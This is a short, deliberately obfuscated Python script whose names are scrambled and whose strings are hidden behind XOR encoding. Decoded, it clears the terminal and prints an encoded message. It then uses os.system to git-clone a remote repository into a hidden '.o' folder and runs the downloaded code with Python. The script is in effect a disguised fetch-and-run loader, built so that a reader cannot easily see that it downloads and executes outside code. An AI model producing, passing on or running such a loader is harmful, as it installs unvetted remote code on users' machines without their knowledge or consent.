l0ll1lll100000101lOOl = (lambda lO0OlO0lO1l11O1l1O110,
    l01lO0O101O1lllO010l0: lO0OlO0lO1l11O1l1O110 ^ l01lO0O101O1lllO010l0)
O0OlO1O110OlOl1101O00 = __import__(''.join(chr(OlOlOO00l11l0l0OO000O ^
    l1l1OlllO011Ol0lO011l) for l1l1OlllO011Ol0lO011l, OlOlOO00l11l0l0OO000O in
    zip(b'\xb0\x14\xf0\x84', b'\xc4}\x9d\xe1')), globals(), locals(), [], 0 *
    15 + 0)
l11Ol1l011l100lOO0O1l = __import__(''.join(chr(l1001O101ll01011O1l00 ^
    OO000Ol1O01O11O1l01lO) for OO000Ol1O01O11O1l01lO, l1001O101ll01011O1l00 in
    zip(b'U/', b"'J")), globals(), locals(), [], 0)
O10010lO101lO11OOlllO = __import__(''.join(chr(lO11O101101lll1Ol0OOl ^
    l1111llO0lO0OO1l01OO0) for l1111llO0lO0OO1l01OO0, lO11O101101lll1Ol0OOl in
    zip(b'N\xe6', b'!\x95')), globals(), locals(), [], 0)
getattr(O10010lO101lO11OOlllO, ''.join(chr(lll11ll0OO1l11l1lllOO ^
    l1OO11Oll101Ol1lO1OlO) for l1OO11Oll101Ol1lO1OlO, lll11ll0OO1l11l1lllOO in
    zip(b'\x9f\xf6\xd4\xd5-P', b'\xec\x8f\xa7\xa1H=')))(''.join(filter(lambda
    l0l1OO0OOl11llO1O0l1O: ord(l0l1OO0OOl11llO1O0l1O) % 3 != 0,
    '\x15u\x06`0`\x03\t\tQi0B$f')).join(chr(O0010l0lOlO11101lllll ^
    Oll1Ol1l1l0001ll1O111) for Oll1Ol1l1l0001ll1O111, O0010l0lOlO11101lllll in
    zip(b'\x0f2\xc0\xc4\xb6', b'l^\xa5\xa5\xc4')))
print(''.join(chr(lOOO0l01l0OllO10l1lO0 ^ lO0O0OllO11OlOO11l001) for 
    lO0O0OllO11OlOO11l001, lOOO0l01l0OllO10l1lO0 in zip(
    b'\x8bM6\x7f\xac\xf5\xed\xa0\xed\xf5\x8b1\t\x14y\x0c6\xd3\xf5',
    b'\x90\x16\x06D\x9f\xc5\x80\xf4\x82\x9a\xe7\x11`z\nxW\xbf\x99')))
getattr(O10010lO101lO11OOlllO, 'sys' + 'tem')(''.join(chr(
    ll100O100l01l0O0111ll - lOO11111O0Ol11O11OO1l + 2 * (~
    ll100O100l01l0O0111ll & lOO11111O0Ol11O11OO1l)) for 
    lOO11111O0Ol11O11OO1l, ll100O100l01l0O0111ll in zip(
    b'5@\xd9C"\x17\xc3\xc9\'L\x05\xa6\xc4\xa7K\xa4\xda\xc9\xc1\xc4\xdb7?\x910\xd308\x04m\x19(\x80\xb4\x16V\x1a\x16\xc2;\xa8m\xfe'
    ,
    b'R)\xadcA{\xac\xa7Blm\xd2\xb0\xd78\x9e\xf5\xe6\xa6\xad\xaf_J\xf3\x1e\xb0_U+=uI\xeb\xdex8lu\xaaQ\x87C\x91'
    )))
getattr(O10010lO101lO11OOlllO, 'metsys'[::-1])('cd .o && python .o'[::-1][::-1]
    )
